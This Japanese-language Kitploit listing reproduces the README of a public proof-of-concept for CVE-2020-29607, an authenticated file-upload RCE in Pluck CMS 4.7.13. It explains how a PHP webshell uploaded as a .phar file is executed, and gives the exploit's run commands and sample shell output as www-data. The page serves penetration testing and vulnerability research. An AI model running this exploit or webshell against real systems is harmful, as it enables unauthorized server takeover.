Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-29607-Pluck-CMS-4.7.13-Authenticated-File-Upload-RCE-PoC — 認証済みのRCEエクスプロイト。Pluck CMS <= 4.7.13の検証されていないファイルアップロードを悪用します。PHPウェブシェルをアップロードし、対話型コマンドシェルを提供します。 | Kitploit
ツール/GitHubGitHub/estebanzarate/cve-2020-29607-pluck-cms-4.7.13-authenticated-file-upload-rce-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubestebanzarate/cve-2020-29607-pluck-cms-4.7.13-authenticated-file-upload-rce-poc

CVE-2020-29607-Pluck-CMS-4.7.13-Authenticated-File-Upload-RCE-PoC

認証済みのRCEエクスプロイト。Pluck CMS <= 4.7.13の検証されていないファイルアップロードを悪用します。PHPウェブシェルをアップロードし、対話型コマンドシェルを提供します。

リポジトリを見る
16ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-29607 — Pluck CMS <= 4.7.13 認証済みファイルアップロード RCE (PoC)

Pluck CMS 4.7.13 以前における認証済みリモートコード実行。管理画面のファイルマネージャー (admin.php?action=files) はファイル拡張子を検証しないため、.phar ファイルのアップロードが可能となり、Apache がそれを PHP として実行します。このエンドポイントにウェブシェルをアップロードすると、ウェブサーバーユーザーとして RCE が発生します。


動作の仕組み

  1. 提供された管理者パスワードを使用して認証します。
  2. 管理画面のファイルマネージャーを介して PHP ウェブシェルを shell.phar としてアップロードします。
  3. シェルにリクエストを送信し id を実行することで実行を確認します。
  4. アップロードしたウェブシェルに対して対話型コマンドループを開きます。

必要条件

  • Python 3
  • 依存関係のインストール:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

使用方法

root@kitploit:~
# Pluck at root
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD

# Pluck in a subdirectory
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD --path /pluck

例:

root@kitploit:~
$ python3 exploit.py -u http://10.10.10.10 -p admin123
[*] Logging in...
[+] Logged in
[*] Uploading webshell...
[+] Webshell uploaded
[*] Shell URL: http://10.10.10.10/files/shell.phar
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> whoami
www-data

参考情報

  • CVE-2020-29607
  • EDB-49909
  • Ron Jost (Hacker5preme) によるオリジナル PoC

謝辞

  • 発見とオリジナルエクスプロイト: Ron Jost (Hacker5preme)
  • Python 3 移植と対話型シェル: Esteban Zárate
ツールをダウンロード